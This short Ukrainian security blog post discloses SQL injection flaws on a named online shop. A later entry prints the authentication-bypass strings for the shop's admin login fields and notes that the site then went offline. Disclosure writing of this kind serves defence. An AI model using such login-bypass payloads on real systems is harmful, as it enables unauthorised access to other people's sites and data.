Websecurity - Веб безпека

08.02.2010

У травні, 24.05.2009, я знайшов SQL Injection уразливості на сайті http://www.vilmorin.com.au (онлайн магазин). Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно дірок на сайтах онлайн магазинів в останнє я писав про уразливості на rozetka.com.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

27.09.2010

SQL Injection (Auth Bypass):

На сторінці http://www.vilmorin.com.au/admin/

admin’ or 1=’1
В полі username.

‘ or ‘1′=’1
В полі password.

Зараз сайт не працює. Схоже, що замість виправлення дірок, власники сайта вірішили його закрити.

This entry was posted on 16:08 27.09.2010 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.